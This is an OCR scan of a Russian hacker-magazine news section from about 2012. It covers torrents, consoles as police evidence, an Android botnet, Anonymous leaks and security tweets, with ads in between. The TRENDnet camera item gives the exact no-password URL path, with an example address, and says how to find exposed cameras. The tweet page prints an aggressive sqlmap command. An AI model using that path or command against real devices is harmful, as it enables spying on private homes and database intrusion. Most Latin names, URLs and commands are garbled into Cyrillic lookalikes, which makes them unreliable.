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ВООБРАЖЕНИЕ 
И РАМКИ 



Все по-настоящему новое — это выход за общепринятые рамки 
представлений отом, что возможно, а что нет, что правильно, а что 
абсурдно. Сделатьчто-то новое, не встречая потока критики и со- 
мнений — в принципе невозможно, та к уж устроены люд и. Умение 
бытьчуточку сумасшедшим и иногда делать вещи, которые кажут- 
ся окружающим сомнительными или даже абсурдны ми — большое 
счастье! Ведь это снимает с тебя шоры и позволяет смотреть на 
вещи шире, чем остальные люди. 

В детстве у каждого человека все это есть: мы воспринимаем 
мир с самого начала, живем и чувствуем все по-настоящему, без 
искусственных границ. Но вот с годами мышление большинства 
людей сильно стереотип из и руется и в определенный момент 
разум перестаетбытьспособным производить что-то новое и вы- 
ходить за навязанные снаружи рамки. Даже шнурки завязать по- 
новому человекуже не может, не говоря уже отом, чтобы создать 
с нуля что-то. 

Пишуэто ктому, что желаю итебе и самому себе пронести по 
жизни эту способность к созиданию, не стать дол баны ми зомби. 

И не обязательно для этого быть Сальвадором Дали — место для 
творчества, дурачества и выдумывания естьабсолютно в любом 
деле, чем быты низанимался. 



пікі(022, 

гл.ред.Х 



Р.5. Каки обещал, публикую фотографию 
логотипа Хна фоне станции «Восток» — это, на 
минуточку, практически южный полюс. 
За фотку респект Сереге Сильнову! 
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НАРА5ТЕВШ ПОЯВИЛСЯ АНОНС ГРЯДУЩЕЙ 
ОПЕРАЦИИ «ГЛОБАЛЬНЫЙ БЛЭКАУТ». 

На 31 мартаякобызапланирована 
распределительная атака на 13 корневых 
ОМ5-серверов. 



УБИЙЦАТЕЛЕВИДЕНИЯ 

СОЗДАТЕЛЬ ПРОТОКОЛА ВІТТОККЕЫТ ПРИДУМАЛ КОЕ-ЧТО НОВОЕ 



ПРИСТАВКИ НА СЛУЖБЕ 
ПОЛИЦИИ 



огда Брэм Коэн создавал протокол ВіЕГоггепІ, желая сделать«что-то 
действительно полезное людям», он совсем не ожидал такого от- 
клика и такого успеха. Пристальное и не всегда приятное внимание 
к его персоне, неожиданные пожертвования, посыпавшиеся от благодарных 
пользователей, и сумасшедшая популярностьегодетища едва неотвратили 
Коэна от ВіБГоггепЕ Но, к счастью, он все же продолжил заниматься его под- 
держкой и разработкой. 

Недавно Брэм анонсировал новую версию протокола, получившую имя 
ВіБГоггепІ І_іѵе. На разработку Коэн потратил три года, и предназначается 
новшество для организации видеотрансляций через пиринговые сети. Теперь 
даже при многомиллионной аудитории задержка передачи видео не должна 
превышать и пяти секунд. ВіБГоггепІ І_іѵе позволяет снизить нагрузку на рас- 
пространителя файла до 99%. По словам Коэна, передача видео таким образом 
будет стоить дешевле, чем по спутнику или с помощью С0І\І, и для нее не по- 
требуется дорогостоящая инфраструктура. Бета-версия доступна поадресу 
Ііѵе.ЬіиоггепЕсот. и авторужезаявляет, что ВіГГоггепІ Ыѵеубьеттелевидение 
веготекущем виде — должна кануть в лету физическая инфраструктура ТВ. 
ТеперьКоэн находится вактивном поиске партнеров, которые дадутсогласие 
на распространениесвоего контента по предложенной им модели. Известно, 
что разработкой уже заинтересова л ись в ЫеіЛіх и Ниіи. 





СамБрэмнѳслишком 
одобряетвесь 
сегодняшний пират- 
ский бум и никогда 
ничегонескачивал 
нелегально. Он 
хорошо понимает, — 
МРАА, РІААи прочие 
организации будут 
только рады, если 
он это сделает. «Ни 
в коем случае не хочу 
даватьимповод,они 
навернякатолько 
этого и ждут»,— 
говоритКоэн,и, 
вероятнее всего, он 
прав. 



ПРАВООХРАНИТЕЛИ ТОЖЕ СТАРАЮТСЯ ИДТИ В НОГУ 
С ПРОГРЕССОМ 





лагодаря мно- 
гочисленным 
операциям 
хакеров, причисляю- 
щихсебя кАпопутоиз, 
успециалистов и про- 
стыхпользователей 
появилосьнемало 
«информации краз- 
мышлению». Например, 
в конце прошлого года 
в Сеть слили огромный 
архив ( разіеЫп.сот/ 
ІМѵѵМ8еЬРѴѴ ) с пись- 
мами представителей 
^ правоохранительных 
органов, в том числе — 
данные с СтаіІ-аккаунта 
Министерства юстиции киберпреступлений Калифорнии. 
Эксперты АгзТесЬпіса основательно покопались в этом 
архивен пришли к интересным выводам. Оказывает- 
ся, ХЬох, Р53 и іРасІ сегодня стали одними из основных 
средств поиска доказательств в судебных расследовани- 
ях. Временныеотметки в сохраненных играх, контрольные 
точки (чекпоинты) и даже скриншоты (например, такие, 
как делает ХЬох Кіпесі), — все это является доказатель- 
ством и может помочь в решении вопроса о виновности 
подозреваемого. 

Также участил ось использование полицией онлай- 
новых сред (таких как ХЬох І_іѵе) для общения с подо- 
зреваемыми и ведения записи переговоров. Агз ТесЬпіса 
отмечает, что компания МісгозоН вообщезарегистриро- 
вала «законный перехват», то есть систему, позволяющую 
вести прослушку интернет-переговоров, втом числе 
вХЬох Ыѵе или Бкуре. 




ВЛАСТИ ИРАНА НАЧАЛ И 
ГЛУБОКУЮ ФИЛЬТРАЦИЮ 

трафика на магистральных 
каналахсвязи,убивая все 
55І_-соединения. Протокол 
НТТР5 не работаетни на 
одном сайте. 



В ѴШ00ѴѴ5 8 НЕ БУДЕТ КНОП- 
КИ «ПУСК», хотя связанная 
с ней функциональность все 
же сохранится в системе. 
Также ОС обзавелась новым 
лого. 



В КАЗАХСТАНЕ ПРЕКРАТИ- 
ЛИ РАБОТУ ПРАКТИЧЕСКИ 
ВСЕ КРУПНЫЕ ТОРРЕНТ- 
ТРЕКЕРЫ, что связано 
с вступившими в силу в конце 
января изменениями в за- 
конодательстве страны. 



ВАНОКОІОМАККЕТ 

ПОЯВИЛСЯАНТИВИРУС. 

Сервис Воипсег будет 
автоматически сканировать 
все приложения на предмет 
содержания вирусов и иных 
вредоносных программ. 



РОХОШИ ВЗЛОМАЛИ ХАКЕРЫ 
ИЗ ГРУППЫ 5ѴѴА665ЕСІЖІТѴ. 
Данные о серверах, информа- 
цию о партнерахкомпании, 
логины и пароли, и даже 
платежные документы Арріе 
выложили на ТРВ. 
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ЕЖЕНЕДЕЛЬНИК 

В ЭЛЕКТРОННОМ 
ФОРМАТЕ ВЫХОДИТ 
В СУББОТУ УТРОМ 



ГЕРОИ И ЗЛОДЕИ 

АНГЛИЙСКОЙ 
ПРЕМЬЕР-ЛИГИ 
ПО ПОНЕДЕЛЬНИКАМ 



КЕАОЕК^аіС.ГШ 

ИЩЕМ АВТОРОВ. 
ПРИСЫЛАЙТЕ 
ИНФОРМАЦИЮ О СЕБЕ 



КАЖДУЮ НЕДЕЛЮ 

НАШ КОЛУМНИСТ 
О ФУТБОЛЬНОЙ 
КУЛЬТУРЕ 



Реклама 



МЕ6АЫЕѴѴ5 



СОЦИАЛЬНАЯ СЕТЬ «ВКОНТАКТЕ» окончательно перебралась на международный домен ѵк. сот. 



УЯЗВИМОСТЬ ВУСТРОЙСТВАХ 
ТРЕЫОЫЕТ 

ЧТОБЫ ПОСМОТРЕТЬ ВИДЕО, ДОСТАТОЧНО ЗНАТЬ ТОЛЬКО ІР-АДРЕС 
КАМЕРЫ 



© ткелолЕт 






г № Еу^Гг-т ІпІйгтлЕіоп * Олъ'Іі!* Яп^пг 


птаЕістп 


ІЙГТІ,-тк| г 


| С|Л*ГІ №**>* 


Га РІ ВД 




_,н — ^ 









Тгепсіпеіуже при- 
знала, чтос2010года 
даннаяуязвимость 
действительно 
присутствуете 26 
моделяхее ви- 
деокамер, и недавно 
опубликовала новую 
версиюпрошивки, 
которая закрывает 
дырку. 



омпанияТгепсіпеІ широко известна благодаря 
своим системам домашнего видеонаблюдения. Но 
и у любого крупного вендора случаются оплош- 
ности. Недавно в версии прошивки 1.1.0 (ЬиіІс1 104) была 
обнаруженауязвимость, позволяющая подключаться 
ксистемеТгепсІпеІ через интернети смотреть видео 
с любой ІР-камеры: достаточно просто ввести ее ІР-адрес 
и добавить к нему путь из 15 символов, одинаковый для 
всех моделей. Никакого пароля не нужно. Для доступа 
к видеопотоку (даже если он за паролей), достаточно про- 
сто добавить в конце путь/апопу/пщрд.сді, и весь контент 
прекрасно отображается. Например, введя такойадрес: 
Шр://192.168.1.3/апопу/т)рд.сді,ты получишь беспа- 
рольный доступ к домашней системе видеонаблюдения, 
котораяустановлена на ІР-адресе 192.168.1.3. 

Совсем неудивительно, что эта новостьуже разлете- 
лась по сети, на РазІеЬіп выложили список более чем на 
1 000 ІР-адресов, немногим меньше собрали на РесШ. 
ІР-адреса систем видеонаблюдениятакжелегко ищутся 
через зЬосІапЬд. сот, который для этого и предназначен. 
Достаточно ввести поисковый запрос [пеісат]. 





ТОП ПЛОХИХХОСТИНГОВ СОСТАВИЛА КОМПАНИЯ СВООР-ІВ 



ПО РЕЗУЛЬТАТАМ 
ИССЛЕДОВАНИЙ САМЫЙ 
ОПАСНЫЙ НА КОНЕЦ 2011 ГОДА 
ХОСТ ЗАРЕГИСТРИРОВАН 
В ЛИТВЕ— ЭТО Н05ТІЫ6 МЕОІА. 



ДОБРО ПОЖАЛОВАТЬ 

ВДОПОЛНЕННУЮ 

РЕАЛЬНОСТЬ! 

СООСЬЕ СОБИРАЕТСЯ ВЫПУСТИТЬУСТРОЙСТВО 
АІІСМЕМТЕР ВЕАЫТѴ 

Сети давным-давно циркулируют слухи о том, что 
у корпорации Соодіеестьсекретные подразделе- 
ния, где ведется разработка безумных гаджетов, 
чуть л и не сборка Терминаторов. А недавно появились со- 
общения, что сейчас в жилых домах сотрудников компании 
проводитсятестированиенекоего«прототипа развлека- 
тельного устройства», работающего в составе домашней 
сети и способного подключаться кбытовой электронике 
посредством ѴѴі-Рі и ВІиеІооіЬ. Возможно, речьотелевизи- 
онной приставке от Соодіе, а возможно — о панели управ- 
ления умным домом. Доподлинно ничего не известно, ведь 
информация просочиласьвсеть случайно — иззаявки на 
разрешение означенного тестирования, котору юбоодіе по- 
дала в американскую Федеральную комиссию по коммуни- 
кациям. Большая частьтакихсообщений, увы, таки остается 
слухами, не получая ни подтверждений, ни опровержений. 
Но информация, появившаяся в Сети в этом месяце, носит 
иной характер. Сначала вспомним о том, что еще в дека- 
бре прошлого года начались первые разговоры отом, что 
в Зоодіе работают над какими-то очками, которые в народе 
тутже окрестили Зоодіе СІаззез. Информация происходила 
изсолидного источника — издания ЫеѵѵУогкТітез, которое 
не замечено в распространении «желтухи». Подробностей 
было мало: некое«носимое»устройство, вероятно, конку- 
рент будущего іРобпапо. Поя вилось множество догадок 
и домыслов, например отом, что Зоодіе обратила внимание 
на так называемый НеасІз-ІІр йізріау (НІЮ). Термин пришел 
из компьютерных игр и обозначает часть графического ин- 
терфейса пользователя, служащую для отображения важ- 
ной информации во время игрового процесса. Разумеется, 
это наводило на мысли о дополненной реальности. Между 
тем, сайт9іо5доодІе.сотузнал большедеталей и писал, что 
поданным их источника разработка уже на стадии позднего 
прототипа. И вотпрошлобольшедвухмесяцев, пессимисты 
уже наверняка мысленно похоронили проект, но данные 
о загадочном девайсе поя вились снова, на сей раз более 
подробные. Итак, источник 9іо5доодІе.сот сообщает: 

«Прототипуже на поздней стадии разработки и выглядит 
вточности как обыкновенные очки втяжелой оправе. В них 
встроен дисплей с НІЮ-интерфейсом. На дужках есть не- 
сколько кнопок, и если бы не они, очки невозможно было бы 
отличитьотобычных. Насколько нам известно, это не перифе- 
рийное устройство для других Апбгоісі-девайсов, каксообщал 
ІМѴТ, — очкинапрямуюсвязываютсясоблаком.Однакоони 
могутиспользоватьѴѴі-Рі или ВІиеІооіЬ4.0. Областьприме- 
нения — дополненная реальность, которая будетпривязана 
ксервисам геолокации Зоодіе. Пользователь может гулять, 
а надисплееочков, вдухеТерминатора, будет всплывать 
информация обувиденных предметах. Очевидно, очки имеют 
встроенный ЗР5 и, по-видимому, работают на АпбгоісІ». 

Известно, чтодисплей естьтолько для одного глаза, он 
непрозрачный и без Зй. Навигация по интерфейсу осущест- 
вляется с помощью движений головы, она проста, и к ней, 
пишет 9іо5доод1е.сот. очень легко привыкнуть. Движения 
головы будут практически незаметны для окружающих. Тех- 
ническиехарактеристики очков, вероятно, будутсопостави- 
мысАпсігоісІ-смартфоном.Нуисамоеинтересное:сообщает- 
ся, что Зоодіе может выпуститьустройство довольно скоро. 
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ВсэтЯЬоди Ш й <ТЕВЬЕ МОЛОЧНИК' произведена из цельного 
(не восстановлен но по) молока очень высокого качества 
Такой строгий контроль оказывается важным и для людей, 
заботящихся о здоровье, поскольку в последнее время ня рынке появилось 
лщшшшмелйк и разбавлений как молока, гак и продуктов ш,н$р. 





МЕ6АЫЕѴѴ5 



АПДЕЙТУСТРАНИЛ20УЯЗВИМОСТЕЙ(включаяоднукритическую)встабильнойверсии6оодІеСИготе 17.0.963.46. 



5ѴМАКІТЕС УТВЕРЖДАЕТ, ЧТО 
В КИТАЕ МОБИЛЬНАЯ ЭПИДЕМИЯ 

БОТНЕТ ИЗАЫОКОШ-УСТРОЙСТВЗАМЕЧЕН В ПОДНЕБЕСНОЙ 




□ пециалисты компании 5утапІес обнаружили 
малварь под названием Рооі5тагІ, которая 
распространяется в альтернативных китайских 
каталогах программного обеспечения. В официальном 
АпсІгоісІ Магкеі подобного, ксчастью, обнаружено не 
было. Рооі5тагІустанавливается вместе с обычным ПО 
из каталога, но при этом передает на удаленный сервер 
номер I М ЕІ, номер ІМ5І, Ю соты, Іосаііопагеа собе и код 
мобильной сети. 

РооіЗтагІ — всего вторая программа после из- 
вестного Оіпдег Мазіег, которая на практике применила 
известный эксплойт ОіпдегЬгеа к. Но, в отличие от пред- 
шественника, РооіЗтагІ не поставляется в комплекте 
с гооі-эксплойтом, а под гружает ОіпдегЬгеак с уда лен- 
ного сервера уже после установки. Рооі-эксплойтидет 
в архиве зЬеІІз.гір в комплекте с двумя вспомогательными 
скриптами для установки в системную область. После 
рутованиятелефона программа подгружаетсудаленного 
сервера еще и йгоіб І_іѵе, котораяуже исполняетроль 
средстваудаленного администрирования и выполняет 
команды с сервера. Таким образом телефон становится 
частьюботнета, и на порутанномтелефонехозяин бот- 
нета, посути, можетинициироватьлюбыедействия. По 
оценкам специалистов, ботнет при носит своим хозяевам 
оті 600 до 9 000 долларов в сутки. 



1 10-140 тыс. 

активныхустройств 

вдень— таковитог 

анализатрафикана 

С&С-серверах.Спе- 

циалисты считают, 

чтоботнетфункцио- 

нируетприблизи- 

тельноссентября 

2011 года. 




РОБОТЫ 

НА ВООРУЖЕНИИ 
АРМИИ США 



ПЕНТАГОН ЗАКЛЮЧИЛ 
КРУПНУЮ СДЕЛКУ 



мери канские военные тоже любят гаджеты. Во- 
енное ведомство США за ключ ил о контакте ком- 
панией Ресоп РоЬоІісз, для которой это круп- 
нейшая сделка за всю историю существования. Согласно 
договоренностям, до 31 мая текущего года армии США 
будет поставлена партия из 1 100 миниатюрных роботов 
Ресоп 5соиіХТ. Заказ оценивается нимногони мало в 13.9 
миллионов долларов. Помимо роботов, военные заказали 
дополнительных аксессуаров для Ресоп 5соиіХТ еще на 
миллион долларов. 

«Несмотря на малый размер, эти машины сыграют 
огромную роль в обеспечении наших бойцов актуальной 
информацией о происходящем на поле боя», — заявил 
представитель Ресоп РоЬоІісз. Судя потому, что не- 
сколько месяцев назад военные уже закупили 31 5 таких 
роботов, в Пентагоне с этим абсолютно согласны. 

Что представляютсобой эти чудо-железяки? Ресоп 
5соиіХТ — это автономная видеокамера высокой 
четкости втитановом корпусе, способная передавать 
качественную картинку на наладонник оператора. Проч- 
ная конструкция робота позволяет в буквальном смысле 
забрасывать его на расстояние до 36 метров. Но больше 
всего поражаетспособность Ресоп ЗсоиіХТ преодоле- 
вать вертикальные препятствия. Эта кроха можетбодро 
перемещаться и маневрировать на вертикальной стене 
( ѵоиіи.Ье/бігіУіхкпІс )! Используя инфракрасный сенсор 
и бесшумный привод, Ресоп ЗсоиіХТ может вплотную по- 
добраться к«логову врага», не возбуждая подозрений. 



ѴѴЕХБЕР.ВООКТ7007 

ЭЛЕКТРОННАЯ КНИГАПОДУПРАВЛЕНИЕМОСА№ВОШ2.3 



продажу поступила электронная 
книга ѴѴЕХБЕР.ВООКТ7007, рабо- 
тающая на базе АпсІгоісІ 2.3. Техни- 
ческие характеристики новинки таковы: 7 м 
сенсорный І_ЕО -экран с функцией МиШ-ТоисЬ, 
двухъядерный процессор АРМ9, с частотой 1,2 
ГГц и встроенный адаптер ѴѴі-Рі (ІЕЕЕ 802.11 
Ь/д/п) со скоростью доступа до 150 МБит/с. 
Длительное время работы устройству обе- 
с печ и вает аккумулятор емкостью 3700 мАч. 



Объем встроенной памяти составляете ГБ, но 
при желаниии его можно расширить до 32 ГБ с 
помощью карт МісгоБй. ѴѴЕХБЕР.ВООКТ7007 
также оснащается датчиком пространствен- 
ного положения (3-сенсор, и функцией под- 
ключения внешних 115В -устройств (115В ОТО). 
Ридер вы полнен в эргономичном металличе- 
ском корпусе и поставляется в кожаном чехле 
Ориентировочная розничная цена новинки 
— 4999 руб. 
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Можно все! 

Нельзя стоять на месте 

Ищем менеджеров по рекламе 

ІоЬ.дІс.ги 



0&ЗѲ 




(дате)іапЛ 



Работа в стиле Іипк 




МЕ6АЫЕѴѴ5 



ПОДВЕДЕНЫ ИТОГИ ПЕРВОГО ГОДА РАБОТЫ ПРОГРАММЫ ВЦбВОІШѴібоодІе выплатила за баги 6олее410тыс. долларов. 



ВИРТУАЛЬНЫЕ РЕАЛИИ И ДРУГИЕ ИНТЕРЕСНЫЕ ВЕЩИ 

О ЛЕКЦИИ ДЖЕРЕМИ БЕЙЛЕНСОНА И КРУТОМ ОБРАЗОВАТЕЛЬНОМ ПРОЕКТЕ 



серединефевраляжители Москвы (и нетолькоони, 
но об этом поговорим ниже) могли присутствовать 
на лекции Джереми Бейленсона — основателя 
лабораторииѴИиаІ Нитап Іпіегасііоп БаЬвСтэндфорд- 
скомуниверситете ( ѵЫІ.зіапіогсІ.есІи ). Будучи профессором 
факультета коммуникаций, Бейленсон нетолькотрудится 
в одной из самых крутыхлабораторий виртуальной реаль- 
ности в мире, но и специализируется на когнитивной психо- 
логии. Проще говоря, ему интересно, каким образом люди 
могутосознаватьсебя, когда физическиеусловности пере- 
стают иметь значение. Лекция под названием «Бесконечная 
реальность» прошла в рамках дистанционного образова- 
тельного проекта КпоѵѵІебде5ігеат( кпоѵѵІес1де5Ігеат.ги ). 
Какты понимаешь, ключевым словом здесь является «дис- 
танционный». Все мероприятия можно совершенно бес- 
платно посетитьлично, приехав в «Цифровой октябрь», но 
можно также посмотреть в прямом эфире или в архиве, ведь 
ихтранслируют в интернет для десятков тысяч зрителей. 
Синхронный перевод и НБ-качествоприлагаются. Джереми 
Бейленсон начал свое выступление немного необычно 
— вместо телемоста аудитории предложили посмотреть 
вступительное видео. Посредством 20-минутной записи 
Бейленсон объяснил, что не станет сегодня фокусироваться 
на технологиях и методологии, так как всю информацию 
о них можно найти в Сети, но расскажет о результатах ряда 
экспериментов. Речьшлаоцифровыхаватарахвсамом 
широком смысле этого определения: практически о любой 
цифровой репрезентации человеческой личности, будто до 
голос, переданный поБкуре, персонажонлайновой игры или 
воссозданная при помощи специального ПОточная вирту- 
альная копияреальногочеловека. На примерах Бейленсон 
рассказывал, какчеловеквоспринимаетсебя, втехили 
иных виртуальных условиях, в «телах» различных аватаров. 
Кпримеру, пациентожогового отделения во время пере- 
вязки, разумеется, испытываетболь. Но исследования пока- 
зали, чтоесли на голову пациентуодеть шлем виртуальной 
реальности, которыйперенесетего вхолодный мир, где 
многоснега,льда, потрясающей красоты кристаллов итак 
далее, ощущения боли снижаются едва ли не на 90%. 

По окончании видео Джереми уже лично присоединился 
к беседе, немного дополнив изложенное в ролике. На- 
ступила очередьтрадиционных вопросов из зала и беседы 
сэкспертами. Аудитория интересовалась, неаватарли, 
часом, сам Бейленсон, что ждет нас в будущем, опасно ли 





оставлять в сети так называемые «цифровые отпечатки» (то 
есть практически любые следы) и, конечно, не обошлось без 
обсуждения потенциального вреда, который может нанести 
человеку излишнее погружение в виртуальность. 

Стоитзаметить, что другие лекции проекта Кпоѵѵіесіде 
БТгеапп свободно доступны на сайте проекта и тоже стоят 
ознакомления. Кпримеру, недавнолекциючитал Джон 
Перри Барлоу — основатель и вице-председатель ЕІесТгопіс 
РгопТіегРоипсІаТіоп, эксперт по компьютерной безопасности, 
а также поэт и эссеист. Дискуссия окоп ирастах, авторских 
правах и свободе информации вышла крайне интересной. 



Дистанционный образователь- 
ный проект Кпоѵѵіесіде Бігеат 
был запущен осенью2011 года 
Центром новыхтехнологий 
и технологического предпри- 
нимательства ОідіІаІОсІоЬег. Ге- 
неральным партнером Кпоѵѵіесіде 
Бігеат выступаеткомпания 
«Ростелеком», интеллектуаль- 
ным партнером— «Российская 
венчурная компания». 




УЛ ЫРАНОВОСТЬ ОТ «ЯВЫ ЗОЛОТОЙ»! 



«Ява Золотая» представляет новую версию сигарет 
с фильтром-мундштуком — «Ява Золотая Ультра 
Турбо». 

Теперь сигареты «Ява Золотая» с фильтром- 
мундштуком представлены в двух версиях — Турбо 
и Ультра Турбо. Безупречное сочетание отборных 
сортовтабака и мировыхтехнологий позволили 
нам по-новому раскрыть уже знакомый турбовкус! 
Почувствуй преимущество смелыхтехнологичных 



решений от «Явы Золотой» и выбери вкус, оптимально 
подходящий именнотебе! «Ява Золотая Ультра Тур- 
бо»— это современный дизайн, традиционно высокое 
качествотабака и популярный во всем мирефильтр! 
Новые сигареты обладают всеми качествами первой 
версии — смелого решения 2011 года «Явы Золотой 
Турбо», при этом содержание смолы и никотина в 
дыме сигареты существенно ниже: смолы — 4 мг, 
никотина — 0,4 мг, СО — 5 мг. 




МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖДАЕТ: 
КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ _ 



Ьаскегіѵѵееіз 



(ЭпООЬгпеІ: 

./здітар.ру -и Ьир://игІ/ — сга\л/І=5 
— ІеѵеІ=5 — гізк=3 — іЬгеасІ5=1 0 <~ 
Ты может быть и нуб, но ты нуб 
с базой данных! 

Н Комментарий: 

Шутки шутками, но здіппар — дей- 
ствительно крутая тулза для эксплуатаций 
5СИі-дырок. 



гаСНгЫоНпВПеу: 

Я предлагаю заменить выра- 
жение «как отнять конфетку 
у ребенка» на «как обойти 
антивирус»... По сути — одно и то же :] 

Н Комментарий: 

Обхождение антивируса, чаще всего, 
не самая сложная задача при пентесте, тут 
Крис прав... 




-Л 



(ЭсогеІапсОсІЗг: 

Один из моих фаззеров упал 
с крешем, — плохо, что не экс- 
плуатируемо :) 



(Эдеоѵесіі: 

Нерды — просто люди, которые 
горят чем-то достаточно, чтобы 
тяжело над этим работать. 



(ВсІагкуБІ: 

Дорогой Гугль, я успешно полу- 
чил 5 уведомлений, 18 е-майлов 
и 6 поп-апов о том, что ты 
меняешь политику конфиденциальности. 
Пожалуйста, пошли мне еще. 



ГСМІіеаІис: 

Это неплохая идея, делать жур- 
налирование истории консоли 
на твоем веб-сервере: >(іее 
-а ~/.Ьа5І~і_Ы5Іогу I Іоддег -I «$ІІ5ЕП[$$] 
$55Н_С0М N ЕСТІО Ы») 



ІВРігеІохЫідІііІу: 

А5І_Н теперь обязателен 
для всех сІИ- модул ей в пла- 
гинах (для Винды) так как 
не-А5І_П модули могут разрушить всю 
безопасность Щі 

Комментарий: 

Хороший ход для РігеЬх, но... 



(Эра_к(: 

Эксплуатация СѴЕ-201 1 -2371 
(Еігеіюх гесІисеРідЫ:) без исполь- 
зования не-АББР модулей: 




ІіНр:/Л.со/ЗиМІШц 

Н Комментарий: 

...но этого не достаточно! 
Увлекательное чтиво про эксплуатацию 
дыры в Рігеіюх с обходом йЕР и А5І_Р. 
Причем А5І_Р обходится не через РОР 
в не-А5І_Р модулях, а через утечку базового 
адреса сІІІ и уже последующего построения 
РОР-программы для полученной сІІГки. 



ГЭРгеесІотСогіег: 

Не эксплойты ломают код. 
Разработчики ломают код... 



(ЗіозНсогтап: 

Подсказка: название ѴѴЬіІе 
Рарег не поднимает ваш текст 
магическо-автоматическим 
способом на уровень «Суперлидерского- 
исследования-в-области-ИБ». 




гаИпих: 

Щш ^ Пожалуйста, почему... Ну почему 
же мы до сих пор плачем каж- 
дый раз, когда происходят кося- 
ки с 55І_. Ведь он и так умер несколько лет 
назад. Настало время тихой скорби... 

Комментарий: 

И действительно, 55І_ вымирает, но 
мы еще держимся за него. Но и уязвимости, 
и провалы доверенных корневых центров, — 
все это лишь подрывает доверие. 




ГаКотіЗрНіпХ: 

«Физика — как секс: конечно, 
может дать некоторые практи- 
^ ческие результаты, но не из-за 

этого мы ей занимаемся.» (с) Доктор Ричард 
Фейнман <3 

Н Комментарий: 

Ричард Филлипс Фейнман (англ. 
РісЬагсІ РЬіІІірз Реуптап; 11 мая 1918 — 15 
февраля 1988) — выдающийся амери- 
канский ученый. Основные достижения 
относятся к области теоретической физики. 
Один из создателей квантовой электроди- 
намики. В 1943 — 1945 годах входил в число 
разработчиков атомной бомбы в Лос- 
Аламосе. 




ГатаМііаБ: 

Валидный ЭаѵаБсгірЕ Ігу { х; } 
саІсЫ _ _ ) { сопзоіе. 

ІодССОйЕ, У и N0 ѴѴОРК '); } 
ЬНр://ио/РТЭаЩ 

□ Комментарий: 

Забавное мини-исследование на тему 
наименований переменных в ЭаѵаБсгірЕ 
Может быть годным для обхода фильтров, 
например :) 



а ПМаѵеаіІеІ: 

ѴѴР Кѵѵ! Удаленный доступ 
с правами 5У5ТЕМ для наиболее 
популярной (в области продаж) 
системы удаленного администрирования? 
Без аутентификации! Бутапіес рсАпуѵѵЬеге 
12.5 выполнение произвольного кода. 



ГЭіОпІс: 

Я потерял 80 фолловеров с тех 
пор как объявил, что, возможно, 
один из них ответственен за 
взлом экс-министра обороны. 




П ІЭеѵасісІе: 

Визуальный язык интернет- 
конфиденциальности в основном 
о защите маленьких девочек- 
блондиночек. 
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МЕ6АЫЕѴѴ5 



ИНДИЙСКИЙ МІСН050РТ5Т0КЕ ВЗЛОМАЛИХАКЕРЫ ИЗ ЕѴИ5НА00ЖТЕАМ. Дело не ограничи- 
лось дефейсом, парни также выложили скриншоты сфайлами БД магазина. 



НАСВИСТИ МНЕ ССЫЛКУ 



АМ0ЫѴМ01І5 СЛУШАЕТ 



ЗВУКОВОЙ АНАЛОГОВ-КОДОВ ГОТОВ К РАБОТЕ 




Бесплатноепри- 
ложениеБопіс 
Ехрегіепсез, которое 
предоставляет до- 
ступ ко всем описан- 
нымфункциям,уже 
вышло и доступно 
в версиях для іРІіопе 
иАпсігоісІ. 



□ последнее время мы частенько упоминаем на страницах журнала 

(ЭР- коды, да и сами нередко пользуемся ими в жизни. Технология дей- 
ствительноудобная и, соответственно, набирающая популярность. 

Но, думаем, многие согласятся с тем, что не всегда удобно пытаться навести 
камеру смартфона на какой-либо объект, переживая о том, хорошо ли его 
видно. Команде стартапа Бопіс ІМоііМ зопіспоШѵ.сот ). очевидно, недавала по- 
коя та же мысль, и из нее родилась новая технология — своеобразный аналог 
ОР-кодов. Звуковой. 

По задумке разработчиков, устройства на базе Ю5 иАпсігоісІ могутна 
ультразвуковых частотах обмениваться данными небольшого объема. К при- 
меру, возможностей Бопіс Ыо^у вполне достаточно для передачи ссылки и ее 
мгновенного открытия на телефоне. Кроме того, ультразвуковой сигнал можно 
интегрировать в любой музыкальный трек или звуковую дорожку видеороли- 
ка, чтобы слушатель мог получить доступ к дополнительной информации. 

Метаданные можно встроить в любую аудиотрансляцию, что, по мнению 
создателей, будет востребовано в музеях или выставочных галереях, для 
обеспечения посетителей разнообразными сведениями об экспонатах и их 
авторах. На концертахтехнология позволит, кпримеру, открытьсайтиспол- 
нителя, или обнаружить страницу с текстом исполняемой песни. Признаемся, 
нам на ум почему-то приходят не музеи и галереи, а несколько иные варианты 
применения технологии :). 



ОТ ВЕЗДЕСУЩИХ ХАКЕРОВ НЕ МОГУТ 
УКРЫТЬСЯ ДАЖЕ ФБР И ПОЛИЦИЯ 



ели бы нам вздумал ось писать обо всех деяниях 
хактивистов Апопутоіі5,то, наверное, пришлось 
бы учредить отдельное дополнение к журналу. 
Одна ко некоторые проделки хакеров «бесчисленного ле- 
гиона» все же достойны упоминания. Например, в прошлом 
месяце из-за них здорово опозорились ФБР и полиция 
Скотланд-Ярда. Посообщению Би-Би-Си, вянваретекуще- 
го годахакеры каким-тообразом подслушалителефонный 
разговормеждуэкспертамиФБРи полиции! Входебеседы 
сотрудники органов ка к раз дел ил ись информацией о са- 
мих Апопутоив и обсуждали планы ареста членов группы, 
включая даты и имеющиеся доказательства. Хакеры вы- 
ложили запись разговора наѴоиТиЬе, где она доступна до 
сихпорі ѵоиІи.Ье/рІЗзрѵѵгЦХЮ . 

Крометогобыли опубликованы фрагменты переписки 
поэлектронной почте между Скотланд-Ярдом и ФБР, где 
прекрасно видны адреса остальныхучастников конфе- 
ренции ( ра5ІеЬіп.сот/864|І.І"іа8 ). 

ФБРуже подтвердилофактперехвата информации иза- 
являет, что разыскивает виновников. Подразделение по 
борьбе с киберпреступностью Скотланд-Ярда также сооб- 
щает, что инцидентрасследуется. Правоохранительным 
органам явно очень интересно, каким образом Анонимы 
смогли за получить запись. 










СУД ОБЯЗАЛ «ВКОНТАКТЕ» 

выплатить компенсацию 
в размере 220 000 рублей 
ввиду нарушения прав интел- 
лектуальной собственности 
на композиции группы «Ин- 
финити» и певицы Максим. 




15АПРЕЛЯ ѴОТАЗАПУ- 
СТИТ В МОСКВЕ СЕТЫТЕ, 

работающую на частотах 
2500-2530 МГц и 2620-2650 
МГц.ПереходсѴѴіМАХна І_ТЕ 
состоится в ночь с 14 на 15 
апреля. 




ВЛАСТИ ШТАТА НЕВАДА 
ПРИНЯЛИ ИСТОРИЧЕСКОЕ 
РЕШЕНИЕ: официально 
разрешили езду по трассам 
общего назначения роботи- 
зированным автомобилям 
без водителя. 




